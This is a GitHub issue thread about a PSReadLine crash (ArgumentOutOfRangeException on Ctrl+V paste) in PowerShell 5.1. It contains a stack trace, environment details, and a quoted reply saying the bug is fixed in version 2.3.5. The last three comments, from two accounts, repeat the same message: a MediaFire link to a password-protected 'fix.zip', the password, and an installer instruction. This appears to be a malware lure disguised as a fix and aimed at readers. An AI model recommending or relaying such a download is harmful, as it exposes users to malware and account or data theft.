### ISSUE TITLE
System.ArgumentOutOfRangeException when pasting text.

### ISSUE THREAD

**Issue by katorymnd** [PowerShell/PSReadLine#4140]
### Prerequisites

- [X] Write a descriptive title.
- [X] Make sure you are able to repro it on the [latest released version](https://www.powershellgallery.com/packages/PSReadLine)
- [X] Search the existing issues, especially the pinned issues.

### Exception report

```console
Last 1 Keys:
 Ctrl+v

Exception:
System.ArgumentOutOfRangeException: The value must be greater than or equal to zero and less than the console's buffer size in that dimension.
Parameter name: top
Actual value was -1.
   at System.Console.SetCursorPosition(Int32 left, Int32 top)
   at Microsoft.PowerShell.PSConsoleReadLine.ReallyRender(RenderData renderData, String defaultColor)
   at Microsoft.PowerShell.PSConsoleReadLine.ForceRender()
   at Microsoft.PowerShell.PSConsoleReadLine.Paste(Nullable1 key, Object arg)
   at Microsoft.PowerShell.PSConsoleReadLine.ProcessOneKey(ConsoleKeyInfo key, Dictionary2 dispatchTable, Boolean ignoreIfNoAction, Object arg)
   at Microsoft.PowerShell.PSConsoleReadLine.InputLoop()
   at Microsoft.PowerShell.PSConsoleReadLine.ReadLine(Runspace runspace, EngineIntrinsics engineIntrinsics)
```

### Screenshot

N/A

### Environment data

```console
PS Version: 5.1.19041.4648     
PS HostName: ConsoleHost       
PSReadLine Version: 2.0.0-beta2
PSReadLine EditMode: Windows
OS: 10.0.19041.1 (WinBuild.160101.0800)
BufferWidth: 95
BufferHeight: 23
```

### Steps to reproduce

1. Open PowerShell (version 5.1.19041.4648).
2. Navigate to a specific directory (e.g., `PS D:\RemoteLinker\remotefilesync>`), if relevant.
3. Copy text from another application.
4. In the PowerShell console, press `Ctrl+V` to paste the text.
5. Observe the error message:
6. (Optional) Resize the console window before pasting to see if it affects the error occurrence.

### Expected behavior

- After pressing `Ctrl+V` to paste text into the PowerShell console, the copied text should be inserted at the current cursor position without any errors or exceptions.
- The console should continue functioning normally, allowing further input or commands to be executed as expected.
- There should be no changes to the console’s cursor position or behavior other than the expected movement associated with pasting text.

### Actual behavior

- When pressing `Ctrl+V` to paste text into the PowerShell console, an error message is immediately displayed:

**Comment by katorymnd** [comment]
Yes, its a fix.

> This issue was already fixed (see #1306). Please upgrade to the [2.3.5 version of PSReadLine](https://www.powershellgallery.com/packages/PSReadLine/2.3.5) from PowerShell Gallery. See the [upgrading section](https://github.com/PowerShell/PSReadLine#upgrading) for instructions. Please let us know if you run into the same issue with the latest version.

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
